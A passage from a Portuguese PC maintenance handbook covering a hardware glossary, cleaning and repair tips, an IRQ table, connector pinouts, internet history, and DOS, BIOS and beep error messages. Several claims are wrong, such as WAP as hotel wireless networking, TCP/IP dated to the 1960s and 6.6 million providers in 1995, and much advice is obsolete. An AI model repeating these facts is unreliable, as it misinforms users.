móveis e é construído em torno de um circuito integrado semicondu-
tor, o qual é responsável pelo armazenamento, diferentemente dos
sistemas magnéticos (como os HDs).

SVGA - Super VGAé geralmente usado com relação a monitores que


suportam resoluções superiores a 640 x 480 e mais de 256 cores.

320
TCP/IP - Transmissão Control Protocol / Internet Protocol - Protocolo
de transmissão de dados em rede interna e ou internet. Desenvolvido
na década de 60 pelo departamento de defesa dos EUA, para ser
usado na Arpanet, rede militar que foi o embrião da Internet atual. A
principal virtude do TCP/IP é permitir que os outros computadores da
rede continuem conectados mesmo caso um ou vários computadores
caiam. No caso de uma guerra, o que sobrasse da rede continuaria
funcionando.

TRC - Tubo de Raios Catódicos - O tubo de raios catódicos (o mesmo


que CRT) é o monitor de vídeo comum, tanto do computador como da
TV, hoje quase em desuso substituído pelo de cristal líquido.

TSR - Terminate and Stay Resident - A tradução literal seria: termine


e fique residente. é uma chamada de arquivos em sistemas operacio-
nais de DOS e mantém o programa em memória. Muitos fabricantes
de software usam a chamada para criar o aparecimento de multitas-
king, transferindo o controle automaticamente para o programa termi-
nado em automático. Alguns programas de TSR efetivamente não
são diretamente os driver de dispositivo para hardware apoiado por
MS-DOS.

URL - Unifor Resource Locator - Podemos traduzir como:


<I>Localizador Uniforme de Recursos</I>, é o endereço de um recur-
so (um arquivo, uma impressora etc.), disponível em uma rede, seja a
Internet, uma rede corporativa, ou uma intranet. A estrutura de uma
URL tem a seguinte formação: protocolo://máquina/caminho/recurso,
como por exemplo: http://www.pcpinformatica.com/.

USB - Universal Serial Bus - Barramento plug-and-play relativamente


lento (12 mbps) que pode ser usado por vários tipos de dispositivos.
Todas as placas mãe atuais trazem portas USB. Cada porta pode ser
compartilhada por vários dispositivos.

VLB - Vesa Logical Bus - Um padrão de barramento sucessor do ISA,


mas anterior ao PCI, usado apenas em placas para 486. Criado pela
Vesa, uma associação de fabricantes de placas de vídeo em 93.

321
WAP - Wireless Application Protocol - Protocolo de dados desenvol-
vido para uso em dispositivos sem fio, como celulares e atualmente
muito difundido para uso em ambientes onde não seja permitido es-
tender fios, um exemplo são os grandes hotéis que disponibilizam a
internet aos seus clientes através deste sistema.

WWW - World Wide Web - É a rede mundial de banda larga, ou, con-
forme os céticos: Wait, Wait, Wait caso você use modem para internet
discada de 14.4 bps.

ZAW - Zero Administration for Windows - Uma coleção de utilitários


produzidos pela Microsoft que visa diminuir o trabalho dos adminis-
tradores de rede, permitindo atualizar programas das estações a par-
tir de qualquer ponto da rede.

Memórias ROM ou BIOS

São memórias somente de leitura e gerenciadoras de informações


básicas ao Sistema Operacional, parte deste gerenciamento é trans-
ferido para as memórias RAM. Um defeito numa memória ROM signi-
fica o travamento completo do computador, ele simplesmente não
funciona. A provável mensagem na tela será "NO ROM BASIC, SYS-
TEM ALTED".

Na falta de uma partição ativa no HD (Hard Disk), o computador exibi-


rá também a mesma mensagem.

Obs.: As memórias ROM não são substituíveis. Em casos específi-


cos, quando soquetada, a BIOS pode ser substituida

Memória RAM

São memórias de leitura e gravação, armazenam parte do S. O., to-


dos os comandos internos e as configurações estabelecidas pelos
arquivos do CONFIG.SYS e do AUTOEXEC.BAT, mantendo-as ativas
e de forma residente. Na falta dos arquivos Config e Autoexec a bios
determina automaticamente um default para os comandos essenciais,

322
(buffers, files, etc.). Parte do gerenciamento de informações e perifé-
ricos permanece com a ROM e parte é controlado pela RAM. Nor-
malmente a quantidade de memórias RAM é mostrada na tela do
computador quando este é ligado.

O defeito mais comum nas RAM é sem dúvidas o "erro de paridade",


isto significa que um dos chips de memória está com defeito. Pode
ainda acontecer no boot do computador o travamento.

Carga do SO

A carga do Sistema Operacional, de um modo genérico, é efetuado


pela BIOS. Não significando com isto que exista somente um único
chips controlando tudo, podemos ter separadas a BIOS do teclado,
de vídeo, CPU e periféricos. O gerenciamento dado pelas BIOS está,
de forma geral, no exemplo seguinte:

FONTE

BIOS

FLOPPY WINCHESTER VÍDEO TECLADO RAM

SETUP

Nos micro computadores, Netbooks ou notebooks, o reconhecimento


dos periféricos, quanto a quantidade e capacidade de formatação, é
feita através do SETUP do sistema. Alguns micro computadores tra-
zem o setup em arquivo executável e outros embutidos no hardware,
isto é, na CPU, onde existe um CI (circuito integrado) próprio de se-
tup.

Em ambos os casos o setup gerencia:

DATA = Data atualizada, com data real;


HORA = Hora atualizada, com relógio de tempo real;

323
DERIVE A = Informar a capacidade de formatação (360, 1.2, 760,
1.44); (atualmente inexistente);
DERIVE B = Informar a capacidade de formatação ou a não existên-
cia deste (atualmente inexistente);
DISCO C = Informar a capacidade de formatação conforme a tabela
interna do setup, ou a não existência do disco rígido, neste caso o
disco será reconhecido por controladora própria se existir;
DISCO D = Idem ao disco C;
MEMÓRIA = Informar o tamanho da memória principal e da estendi-
da, se necessário. Na maioria dos casos o próprio sistema detecta e
reconhece a capacidade RAM;
VÍDEO = Informar o tipo do monitor que está em uso no equipamento,
(CGA, HGA, EGA, VGA, colorido, monocromático, 80x25 ou 40x25;
TECLADO = Informar se está ativo ou não.

Os dados de configuração informados permanecem registrados no CI


de setup, através de uma bateria interna, até que se faça alterações.

Lembre-se de manter anotados os dados referentes ao setup, pois


não raramente o setup zera, isto é, apaga totalmente e tem de ser
refeito em suas informações.

Nos antigos micro computadores XT não existe setup, o reconheci-


mento da capacidade de formatação dos derive e do HD (Hard Disk)
se dá por controladoras próprias.

Manutenção de driver

Periodicamente, a cada 60 dias em locais muito poeirentos ou 120


dias em ambientes sem poeira, deve-se usar um aspirador de pó e
retirar a poeira do interior do computador, especificamente do derive,
tomando o cuidado para não bater com a ponta de sucção da man-
gueira do aspirador de pó em partes eletrônicas ou mecânicas do
derive, usar um pincel macio para movimentar a poeira fazendo o
aspirador sugar pelo ar. NÃO passar o pincel nas cabeças de leitura e
gravação com o intuito de limpar, para isso deve-se usar um disco de
limpeza próprio para esta finalidade.

324
Tome especial cuidado com os, pendrivers, CDs ou DVDs, estes po-
dem ser fiéis portadores de vírus de computador, os CDs ou DVDs
defeituosos podem causar danos ao derive e as cabeças de leitura e
gravação.

Não deixe cair no chão, não exponha a temperaturas exageradas.

Manutenção das placas

A limpeza dos contatos das placas, de modo especial no encaixe com


a placa principal, deve ser feito com uma borracha macia ou lápis
borracha e um pincel macio para remover o pó acumulado, mas tenha
muito cuidado para não tirar nenhum dos straps (jampers) com os
movimentos do pincel.

Antes de iniciar a limpeza, procure anotar as posições corretas dos


straps e dos conectores para evitar problemas, caso um deles se
perca e para recolocar os conectores corretamente.

Recoloque a placa, verifique se as conexões estão corretas e só en-


tão ligue o computador.

A limpeza da placa principal também se dá da mesma forma, porém


não se retira a mesma do interior do computador e deve-se tomar
cuidado para não espanar poeira ou outro tipo de sujeira para dentro
dos slots com o pincel.

É também possível, (se todos os periféricos, placas e componen-


tes internos estiverem bem fixados no gabinete e na certeza de
que o HD (Hard Disk) foi travado antes de desligar a máquina),
virar a CPU de cabeça para baixo e bater levemente no gabinete para
que toda a sujeira mais pesada possa cair sôbre a mesa. As vezes
sem que se perceba poderá existir dentro da CPU do computador
algum objeto condutor de eletricidade que poderá causar um curto-
circuito, tais como arruelas ou parafusos soltos. Qualquer ruído estra-
nho que identifique algo solto dentro da CPU é motivo para tentar
localizá-lo antes de dar a tarefa por concluída.

325
CPU – temperatura ambiente

Um dos fatores preponderantes ao bom funcionamento do computa-


dor, é a temperatura ambiente, que deve estar entre 18 e 25 graus
centígrados. Esta faixa de temperatura é própria para que não exista
excessivo aquecimento nos componentes eletrônicos e nem choque
térmico ao se ligar a máquina.

Outro fator prejudicial a ser considerado é a poeira, que cria uma


membrana sôbre os componentes eletrônicos internos, impedindo a
dissipação correta do calor gerado. Também a mesa de trabalho (on-
de se encontra o computador) deve ser firme.

Hardware Interrupt (IRQ)

Number Adress Name Ower


IRQ 00 0DBE:003C Timer Output 0 DOS System Area
IRQ 01 0DBE:0045 Keyboard DOS System Area
IRQ 02 0DBE:0057 [Cascade] DOS System Area
IRQ 03 0DBE:006F COM2 DOS System Area
IRQ 04 0DBE:0087 COM1 DOS System Area
IRQ 05 0DBE:009F LPT2 DOS System Area
IRQ 06 0DBE:00B7 Floppy Disk DOS System Area
IRQ 07 0070:06F4 LPT1 DOS System Area
IRQ 08 0DBE:0052 Realtime Clock DOS System Area
IRQ 09 F000:EED2 Reserved BIOS
IRQ 10 0DBE:00CF Reserved DOS System Area
IRQ 11 0DBE:00E7 Reserved DOS System Area
IRQ 12 0DBE:00FF Reserved DOS System Area
IRQ 13 F000:EEDB Coprocessor BIOS
IRQ 14 0DBE:0117 Fixed Disk DOS System Area
IRQ 15 F000:8F93 Reserved BIOS

Ventilação

Normalmente passa desapercebido do operador ou do digitador, o


ponto mais crítico do computador... o ventilador interno. Deste com-
ponente é que depende todo o bom funcionamento da máquina, sua
parada significa super temperatura na fonte de alimentação elétrica

326
(sôbre aquecimento), sobrecarga dos circuitos provocando a queima
destes, e voltagens erradas em toda a CPU causando erros de leitura
e gravação de dados e até a inutilização de periféricos. Para detectar
o funcionamento do ventilador, basta por a mão próxima a saída de ar
da fonte, e ali deve-se sentir uma leve brisa proveniente do ventilador.
Atenção, não se baseie apenas no ruído causado por ele, se estiver
trancado também produzirá ruído.

Alguns computadores tem o ventilador instalado de forma inversa,


isto é, jogam o ar de fora para dentro da CPU.

Erros de paridade de memória

Existem duas maneiras de se detectar quando existem erros de pari-


dade, isto é, erros de memória causado provavelmente por um dos
chips do banco de memórias: No primeiro caso o computador fica
bloqueado ou simplesmente não acessa a ROM, este sintoma é pró-
prio de paridade no primeiro banco de memórias, porém não é regra,
a causa pode ser outra.

No segundo caso, a verificação de memória que o computador efetua


ao ser ligado, não será a correta existente na máquina, certamente a
verificação será a menor, mas se isto não ocorrer e a qualquer mo-
mento aparecer na tela "erro de paridade", estará caracterizada a
falha em qualquer um dos bancos de memória da CPU e neste casos
o problema é intermitente.

Em qualquer dos casos acima mencionados, se as memórias estive-


rem soquetadas, poderá ser tentada a troca do componente. Via de
regra, troca-se um banco pelo outro e observa-se se o defeito perma-
nece o mesmo ou se alterou, o fato dos componentes estarem soque-
tados e existir a possibilidade de mau contato, a troca de lugar dos
bancos poderá solucionar o problema. Se for necessária a troca por
outro novo, tenha a certeza de que o componente é igual (de mesmas
características) ao que foi retirado. Para localizar qual o ships que
está defeituoso o único meio disponível para o usuário é o de tentati-
va e erro, isto é, a substituição de um-a-um até o funcionamento nor-
mal da máquina, este procedimento também é o mesmo para os

327
banco de memórias em forma de pentes. Se os bancos de memórias
estiverem fixos na placa principal, praticamente o leigo nada poderá
fazer, somente uma assistência técnica de confiança poderá resolver
o problema.

No Windows, este problema se apresenta (conhecido) como “tela


azul”, mas não é regra que seja problema no banco de memória, erro
de leitura no HD também apresenta “tela azul”

Fiação com mau contato

A fiação com mau contato em suas conexões é quase sempre a res-


ponsável por defeitos intermitentes, a própria temperatura pode ser o
agente ativador deste defeito, (dilatação e retração dos metais), até
mesmo a vibração interna de partes mecânicas móveis podem ativar
o defeito, e as partes móveis ligadas em cabos de conexões também
causam os defeitos.

Monitor de vídeo sem brilho

Se o monitor de vídeo não tiver imagem, antes de mais nada observe


o seguinte:

1 - Verifique se está ligado na tomada elétrica e se esta tem corrente;

2 - Verifique se o fusível do monitor não está queimado, troque por


outro de mesmo valor, se tornar a queimar é sinal de que algum com-
ponente interno está em curto-circuito e só um técnico experiente
poderá solucionar o problema.
- Alguns monitores de vídeo tem um fusível interno, se você se sente
capaz de abrir e trocá-lo, faça-o com o devido cuidado;
- Tenha especial cuidado com os monitores LCD, são muito frágeis
no manuseio de reparos.

Teclado falhando algumas teclas

As causas prováveis são: sujeira nos contatos, oxidação dos contatos


ou trilhas abertas na placa do teclado (PCI - Placa de Circuito Im-
presso).

328
Caso você tenha as ferramentas adequadas para o conserto, proceda
da seguinte forma:

Retire os parafusos da tampa traseira do teclado e retire a tampa com


cuidado. Observe se existem parafusos que prendam a PCI, se exis-
tir, retire os mesmos com cuidado para não estragar a placa. Desco-
necte, se houver, qualquer fiação externa. Com a PCI livre, use álcool
isopropílico para limpar os locais de contato com as teclas, limpe
também os contatos das teclas, verifique atentamente se existem
trilhas marcadas e que possam estar abertas, verifique a continuida-
de, se rompidas, faça uma reconstituição da trilha com um estanha-
dor e um pedaço de fio bem fininho. Feito isto, recoloque tudo no
lugar com cuidado, feche a tampa traseira do teclado e teste para ver
se está tudo bem.

Caso não existam parafusos prendendo a PCI, isto significa que os


contatos estão presos um-a-um com estanho, e para soltar será ne-
cessário o uso de um estanhador e um sugador de estanho.

LEMBRE-SE que o uso de estanhador em PCIs exige habilidade no


manuseio pois do contrário, o uso errado, poderá ser fatal para a
placa.

Alguns teclados permitem a retirada dos contatos para limpeza sem


abrir, isto é, podem ser retirados pela parte superior, removendo a
tecla.

Se tiver alguma tecla prendendo, basta retirar e com um estilete ras-


par o plástico pela parte interna da tecla, isto dará mais espaço no
movimento de vai-e-vem e a tecla não prenderá mais.

Impressoras

No caso das impressoras, a única manutenção a nível de eletrônica


que um leigo poderá realizar, é a troca de fusíveis, tanto externos
como internos.

329
A única consideração nestes casos é que se desconecte o ou os
plugs internos de alimentação de fonte da placa para evitar danos,
tais como: queda de um fusível em cima da placa ou ferramenta, cri-
ando um curto-circuito. Tenha em mente que os capacitores da placa
estão eletricamente carregados.

A nível de manutenção preventiva, podemos:

USAR aspirador de pó com frequência para retirar a sujeira produzida


pelo papel, (pó de papel);

USAR um pano embebido em álcool isopropílico para limpar o eixo


por onde o mecanismo da cabeça desliza, e após limpo, usar um
mínimo de lubrificante no eixo. No desnecessário excesso de lubrifi-
cante irá se depositar o pó do papel e criar uma camada de sujeira;

RETIRAR periodicamente a cada 90 dias, a cabeça de impressão


(em impressoras matriciais) e limpar as agulhas com um pincel mais
firme e álcool isopropílico, evite álcool nas bobinas da cabeça.

AO recolocar a cabeça da impressora, tenha o cuidado de não encos-


tar demais contra a "mesa" e também de não deixar muito afastada,
para regular, deixe a alavanca de tensão da cabeça em posição mé-
dia (no meio), use entre a mesa e a cabeça um estilete. A espessura
do estilete é o suficiente como regulagem;

VERIFIQUE se a correia dentada que movimenta o carro está estica-


da, se não estiver, haverá problemas quando usar impressão negrita-
da ou linhas verticais, percebe-se um desalinhamento vertical. Se
esticada demais, poderá falhar na impressão normal, assim como
desgastar rapidamente a correia dentada e a polia do motor;

COM cuidado e com a máquina aberta, vire a mesma de cabeça para


baixo e bata levemente para a sujeira mais pesada sair, isto fará com
que qualquer objeto inconveniente que esteja dentro da máquina,
saia.

330
OS MAIORES INIMIGOS DO TECLADO, CPU, MONITOR DE VÍDEO
E IMPRESSORA, SÃO OS CLIPS E OS GRAMPOS DE PAPEL,
RESPONSÁVEIS POR GRANDES DANOS... TENHA CUIDADO
COM ELES.

Tabelas de conexões

Identificação dos pinos em comunicação serial


/////// DB-9 DB- FUNÇÃO OBSERVAÇÕES
25
Pino 1 8 DCD Sinal de detecção do sinal Car-
rier (portadora)
Pino 2 3 RXD Linha de recepção de dados
Pino 3 2 TXD Linha de transmissão de dados
Pino 4 20 DTR Este sinal indica que o terminal
está pronto
Pino 5 7 GND Tensão referencial (0V) Terra
lógico
Pino 6 6 DSR Sem conexão
Pino 7 4 RTS Solicitação de envio de dados
Pino 8 5 CTS Sinal de que o dispositivo de
entrada está pronto
Pino 9 22 RI Sem conexão
Pino - 1 Terra Terra de chassis (isolado do
terra lógico)

Cabo PC para comunicação em RS-232 (DB-9 x DB-9)


/////// DB-9 X DB-9 Identificação
Pino 1 + 4 + ----- 1 + 4 + Curto entre pinos do mesmo
6 6 conector
Pino 2 com 3 RXD/TXD
Pino 3 com 2 TXD/RXD
Pino 4 + 1 + ----- 4 + 1 + Curto entre pinos do mesmo
6 6 conector
Pino 5 com 5 GND

331
Pino 6+1 + ----- 6 + 1 + Curto entre pinos do mesmo
4 4 conector
Pino 7+8 ----- 7+8 Curto entre pinos do mesmo
conector
Pino 8+7 ----- 8+7 Curto entre pinos do mesmo
conector

Conector de vídeo DB-15 sistema VGA


/////// PINO FUNÇÃO DESCRIÇÃO
Pino 1 RV Red Video
Pino 2 GV Green Video
Pino 3 BV Blue Video
Pino 4 N/U Not Used
Pino 5 GND Ground
Pino 6 RR Red Return (ground)
Pino 7 GR Green Return (ground)
Pino 8 BR Blue Return (ground)
Pino 9 K Key (no pin)
Pino 10 SR Sync Return (ground)
Pino 11 N/U Not Used
Pino 12 N/U Not Used
Pino 13 HS Horizontal Sync
Pino 14 VS Vertical Sync
Pino 15 N/U Not Used

Orientações especiais

Observe como uma tomada elétrica para computador deve ser insta-
lada. Uma inversão nos fios elétricos poderá causar sérias avarias ao
equipamento, bem como causar choques ao tocar no gabinete do
micro.

332
TERRA

NEUTRO

FASE
NEUTRO

FASE

TERRA

Na parte traseira do micro, normalmente os conectores DB25 macho


são usados para comunicação serial e os DB25 fêmeas para comuni-
cação paralela.

Ferramentas

As ferramentas mais comuns usadas para uma manutenção simples


a nível de usuário são:

333
DISCO DE LIMPEZA - Usado para limpar as cabeças de gravação e
leitura dos driver, este disco tem vida útil mas é de grande utilidade
na manutenção dos driver;

ÁLCOOL ISOPROPÍLICO - Também chamado de isopropanol, é de


uso constante e essencial na limpeza;

LUBRIFICANTE - Tipo de uso doméstico, fino;

CHAVE DE FENDA FINA -

CHAVE PHILIPS -

PINCEL PEQUENO - Um pincel macio para limpeza geral e um mais


firme para limpezas mais pesadas, como cabeças de impressoras;

ASPIRADOR DE PÓ - Bastante útil em limpezas internas.

Pode-se complementar com:

ESTANHADOR - O soldador, para reparos em PCIs, por pessoas


mais habilidosas e pacientes;

SUGADOR DE ESTANHO - Complemento do estanhador, para sugar


os excessos de estanho derretido;

MULTÍMETRO - Ou multiteste. Este aparelho exige conhecimento no


uso, normalmente vem acoplado com um provador de continuidade.
Seu uso:

Provador de continuidade
Testador de componentes
Medidor de voltagens
Medidor de amperagens

Internet

A Internet surge nos Estados Unidos na década de 60, época da


Guerra Fria, como uma rede de informações militares que interliga

334
centros de comando e de pesquisa bélica. Para atender à necessida-
de militar de proteger os sistemas de defesa do país no caso de um
ataque nuclear, a rede não tem um "centro" que sirva de alvo princi-
pal ao inimigo. Nos anos 70, a rede começa a ser utilizada pela co-
munidade acadêmica mundial e, em 1975, são feitas as primeiras
ligações internacionais. Nesse período, os computadores conectados
não passavam de 200.

Entre a década de 80 e o início dos anos 90, a rede é aperfeiçoada:


começam a surgir os serviços que dão à Internet sua feição atual. O
principal deles é a World Wide Web (WWW), lançado em 1991, que
viabiliza a transmissão de imagens, som e vídeo pela grande rede.
Até então, só circulavam textos pela Internet por meio de um software
chamado Gopher. Com a WWW, a Internet se populariza entre os
usuários comuns de computadores. Nesta época surgem os provedo-
res de acesso, empresas comerciais que vendem aos clientes o
acesso para "navegar" na Internet. Em 1995, o número de provedores
em todo o mundo é de 6,6 milhões.

A partir de 1994, a Internet amplia suas funções: além de ser uma


rede de circulação de informações, também torna-se um meio de
comercialização de produtos e serviços. É o início do comércio ele-
trônico. Apesar desse comércio ainda ser incipiente, é possível, por
exemplo, comprar CDs, livros e programas de computador.

Acesso à Internet
Para um usuário particular poder usar a Internet, é preciso uma linha
telefônica, um microcomputador com modem (aparelho que permite a
recepção e transmissão de dados por telefone) e um programa de
acesso à rede: os principais são Navigator, da Netscape, e o Internet
Explorer, da Microsoft. O passo seguinte é cadastrar-se em um pro-
vedor de acesso à rede, de preferência um provedor local (na própria
cidade) para não pagar ligações interurbanas ao acessar a rede, no
caso de acesso discado. Ao filiar-se, o novo usuário é rebatizado com
um nome (username), recebe uma senha (password) e um endereço
na Internet. No endereço eletrônico - nome@embratel.net.br, por
exemplo - o nome do usuário e a identificação do provedor escolhido
são separados pelo sinal "@" (arroba).

335
Serviços na Internet
Os serviços mais populares da Internet são o E-mail (correio eletrôni-
co) e a World Wide Web (WWW). Pelo E-mail é possível trocar men-
sagens com pessoas ou empresas do mundo inteiro - estima-se que
sejam em média 16 milhões de mensagens diariamente. O serviço
está substituindo gradativamente os métodos tradicionais da comuni-
cação interurbana e internacional (telefone e fax), que são bem mais
caros. Na WWW encontram-se as homepages, páginas criadas por
pessoas, empresas, instituições e órgãos governamentais. Elas tra-
zem informações em forma de texto, imagens (fotografia, ilustrações),
vídeo e som. Atualmente existem mais de 50 milhões de homepages
no mundo.

Outros serviços bastante procurados são o listserv, o chat e o telnet.


O listserv é a área da Internet reservada aos grupos de discussão
sobre assuntos específicos. Ao se inscrever, o usuário passa a rece-
ber todas as mensagens que estão sendo trocadas sobre o tema de
seu interesse. O chat é o serviço de conversa on-line que permite a
comunicação via teclado com qualquer pessoa de qualquer lugar do
mundo que esteja conectada na mesma hora. O telnet é um software
que permite acessar remotamente outras máquinas, por exemplo,
onde estejam rodando BBSs (sigla em inglês de Bulletin Board Sys-
tem), redes privadas de computadores, destinadas ao uso exclusivo
de seus assinantes. Algumas BBSs oferecem a seus usuários o
acesso à Internet e serviços semelhantes ao da grande rede, como o
E-mail.

As intranets também são redes privadas que estão sendo desenvolvi-


das pelas empresas com o objetivo de facilitar a comunicação interna.
Elas utilizam os mesmos recursos gráficos da Internet e, eventual-
mente, estão conectadas à grande rede.

Internet no Brasil
No Brasil, o acesso à Internet começa em 1990, pela Rede Nacional
de Pesquisas (RNP), que liga as principais instituições de ensino e
pesquisa do país. Em julho de 1995, quando acaba o monopólio da
Embratel como provedor único, surgem diversas empresas privadas
que disputam esse novo mercado. Atualmente existem cerca de 500

336
provedores no país. A provedora Brasil Online, criada pelo Grupo
Abril em julho de 1996, associa-se em setembro do mesmo ano à
Universo Online, provedora do Grupo Folha da Manhã. Em 1996,
cerca de 300 mil brasileiros estão conectados à Internet (60% em São
Paulo, 15% no Rio de Janeiro e o restante nas outras cidades) e a
previsão era a de que esse número chegasse a 1 milhão em 1997.
Hoje passam de 100 milhões de usuários.

Defeitos apresentados por Software

 A tabela de alocação de arquivos não pode ser lida - Pode


ser um problema no disco. Tente recuperar a tabela com o coman-
do chkdsk ou formate o disco.
 A unidade atual não é valida - Provavelmente não há disco
ou a porta da unidade está aberta. Corrija ou vá para outra unidade.
 Abortar, repetir, ignorar, falhar - Ocorreu um erro durante a
operação que estava sendo executada. Se você escolher a abortar o
processo termina; r repetir faz o dos tentar de novo; i ignorar faz o
dos ir em frente com erro mesmo, se possível; f falhar é semelhante
a ignorar, fazendo com que o processamento continue mesmo que
com erro. Utilize as duas últimas (I/F) somente se tiver absoluta cer-
teza dos resultados.
 Acesso negado - O comando que está tentando executar
não é válido, esta mensagem aparece quando tentamos gravar ou
salvar um arquivo que esteja em de leitura ou protegido
 Arquivo não encontrado - O arquivo não foi encontrado
aonde especificado. Verifique o path e o append.
 Arquivos de sistema não foram encontrados - A unida-
de/disco não contém arquivos de sistema ou eles estão danificados.
Reformate usando a opção /s ou use o comando SYS
 Caminho inválido - O diretório especificado no path não
existe. Verifique o path e o append.
 Comando não conhecido no config.sys - Verifique a sinta-
xe das linhas de comando do arquivo config.sys.
 Comando ou Nome de arquivo inválido - Verifique a sinta-
xe do comando ou do nome do arquivo; veja o path.
 Combinação de parâmetros inválida = veja parâmetro invá-
lido.

337
 Command.com inválido = veja interpretador de comandos
inválido ou inexistente.
 Continuar (S/N) - Solicitação de confirmação da operação,
por exemplo durante a execução de um comando DEL *.*
 Diretório de pesquisa especificado inválido - Verifique o
comando shell do arquivo config.sys.
 Diretório inválido - Não é diretório ou não foi encontrado.
Verifique o path.
 Disco sem sistema ou erro no disco - O disco está com
defeito, ou sem os arquivos de sistema use FORMAT/s ou SYS
 Erro de alocação de memória - Houve um problema na
alocação da Memória RAM. Verifique-as se a memória está encaixa-
da corretamente.
 Erro de dados - Ocorreram problemas durante a leitu-
ra/gravação do arquivo. Experimente usar o chkdsk
 Erro de gravação - Retire e recoloque o disquete, se for o
caso, na unidade e pressione R, de repetir; use o chkdsk ou formate
o disco.
 Erro de gravação no dispositivo - Verifique o dispositivo
indicado, se está corretamente configurado, se está ligado, se os
cabos estão bem conectados.
 Erro de leitura - Experimente repetir a operação; use
o chkdsk
 Erro de leitura do diretório - Veja erro de leitura no sistema
operacional.
 Erro de leitura no sistema operacional - Verifique os arqui-
vos de sistema e reinicialize o equipamento.
 Erro de proteção de gravação - Verifique se o disquete não
está protegido.
 Erro de sintaxe - Confira a opção Parâmetro Inválido
 Erro de verificação - O dos não conseguiu interpretar seu
comando, que está incorreto. Repita a operação ou reinicialize a má-
quina.
 Erro intermediário de arquivo durante conexão - Verifique
se o disco não está muito cheio; experimente o chkdsk; reinicialize o
equipamento; altere o comando files do arquivo config.sys.
 Erro interno - Reinicialize o computador.

338
 Erro irrecuperável de leitura ou gravação - Talvez o disco
esteja danificado; experimente o chkdsk
 Erro na carga - Reinicialize o micro; reinstale os arquivos de
sistema.
 Erro na criação do arquivo - Pode não haver espaço em
disco, você tentou renomear um arquivo para o mesmo nome ou o
arquivo já existe e é de somente leitura.
 Erro na impressora - Veja se a impressora está ligada e se
não existe nenhum redirecionamento.
 Erro no arquivo exe - O arquivo pode ser incompatível com
a sua versão do dos ou pode estar com defeito.
 Espaço insuficiente em disco - Apague alguns arquivos ou
troque o disco.
 Especificação de unidade inválida - A unidade especificada
não existe física/logicamente.
 Falha geral - Provavelmente o disco não está formatado.
 Falha no arquivo executável - O arquivo contém erros, não
é compatível com sua versão do dos ou existem muitos arquivos
abertos simultaneamente.
 Interpretador de comando inválido ou não encontrado -
Verifique a presença do command.com de versão correta no diretó-
rio raiz e o path.
 Memória insuficiente - Remova arquivos residentes da me-
mória; reinicialize o micro; aumente a memória RAM do equipamento.
 Muitos arquivos abertos - Aumente o número especificado
em files no config.sys; verifique se não é possível fechar alguns ar-
quivos.
 Muitos parâmetros - Confira a opção Parâmetro Inválido
 Muitos redirecionamentos - O dispositivo não existe ou a
saída já foi redirecionada.
 Nenhum disco fixo presente - O disco não está selecionado
ou não está formatado; verifique o setup.
 Nome de arquivo inválido - Existem caracteres coringas ou
não aceitos no nome do arquivo.
 Número incorreto de parâmetros - Confira a op-
ção Parâmetro Inválido
 O arquivo não pode ser copiado para dentro dele mes-
mo - verifique a sintaxe do comando.

339
 O command não pode ser carregado, sistema paralisa-
do - Reinicialize o equipamento.
 O mesmo parâmetro foi introduzido duas vezes - Confira a
opção Parâmetro Inválido
 Opção inválida - Confira a opção Parâmetro Inválido
 Palavra-chave inválida - Confira a opção Parâmetro Inváli-
do
 Parâmetro de função inválido - Confira a opção Parâmetro
Inválido
 Parâmetro do format incorreto - Confira a op-
ção Parâmetro Inválido
 Parâmetro inválido - Você não especificou a opção correta
na linha de comandos, duplicou os parâmetros ou combinou parâme-
tros ilegalmente. Reveja a sintaxe correta do comando e tente mais
uma vez.
 Parâmetro requerido ausente - Confira a opção Parâmetro
Inválido
 Parâmetros não compatíveis - Confira a opção Parâmetro
Inválido
 Processamento de alto nível interrompido, não pode con-
tinuar - Reinicialize o micro.
 Programa grande demais para a memória - Veja memória
insuficiente.
 Sem espaço no ambiente - Remova algumas variáveis,
usando o comando set; reinicialize o micro.
 Sem memória - Veja memória insuficiente.
 Sintaxe inválida - Reveja a sintaxe para o comando.
 Tabela de alocação de arquivos danificada - Utilize
o chkdsk; restaure os backups.
 Tabela de partição inválida - Execute o fdisk para reiniciali-
zar a tabela. Seus dados estarão perdidos.
 Troca de disco inválida - Recoloque o disco original na uni-
dade e tente novamente.
 Valor do parâmetro não está na faixa permitida - Confira a
opção Parâmetro Inválido
 Valor do parâmetro não permitido - Confira a op-
ção Parâmetro Inválido

340
 Versão incorreta do dos - O comando externo é de outra
versão do dos.
 Violação de compartilhamento - O arquivo que você está
tentando usar já está aberto.
 Você deve especificar on ou off - O parâmetro introduzido
na linha de comando deve ser on ou off

Defeitos sinalizados por mensagens

Nesta situação, o micro funciona, mas interrompe as operações com


a apresentação de uma mensagem de erro.

 Channel 2 Timer Error Vericar o chip 80c206 e circuito do


alto-falante
 IntR 1 Error Erro de Interrupção do teclado.
 CMOS Battery State Low Trocar a bateria
 CMOS Checksum Failure Checar opção de memória no SET-
UP
 CMOS System Options Not Set Ver opções de SET-UP, to-
das
 CMOS Dysplay Not Proper Checar opção de vídeo no SET-
UP
 CMOS Switch Not Proper Ajustar placa de vídeo com o sis-
tema ou verificar o jumper da placa de sistema
 Keyboard is Locked...unlock it Destravar o teclado
 Keyboard error Verificar o SET-UP ou o 8042
 KB/Interface Error Problemas no circuito do teclado
 CMOS Memory Size Mismatch Verificar o SET-UP e os ban-
cos de memória SIMM
 FDD controler failure Verificar cabos e conexões do drive
 HDD controler failure Verificar cabos e conexões do winches-
ter
 C: Drive Error Verificar a instalação o winchester, configura-
ção no SET-UP
 D: Drive Error Verificar a instalação o winchester, configura-
ção no SET-UP
 C: Drive Failure Formatar
 D: Drive Failure Formatar

341
 CMOS Time & Date Not Set Verificar a opção time no SET-
UP
 Chache Memory Bad Problemas na memória cache 8042
 Gate not A20 Error Trocar o controlador do teclado 8042
 Adress Line Short Problemas no bus de endereços 8 bits
 Do Not Enable Cache Trocar uma ou mais memórias RAM
 DMA 2 Error Trocar 82C206 ou equivalente
 DMA 1 Error Trocar 82C206 ou equivalente
 DMA 2 Error Trocar 82C206 ou equivalente
 No ROM BASIC Trocar a ROM
 Diskette Boot Failure Usar outro disquete de Boot
 Invalid Boot Failure Usar outro disquete de Boot
 On Board Parity Error Problemas nos bancos SIMM
 Off Board Party Error Problemas nos bancos SIMM
 Parity Error ???? Problemas nos bancos SIMM

Defeitos Sinalizados por Beeps

Como os Beeps, as mensagens de erro se alteram em função do


fabricante da Bios.
No quadro apresenta-se a tabela da AMI com diversas mensagens e
as providências a serem tomadas.

1 Beep - Problemas no circuito de Refresh.


R - Trocar memórias RAM por outras sabidamente boas.

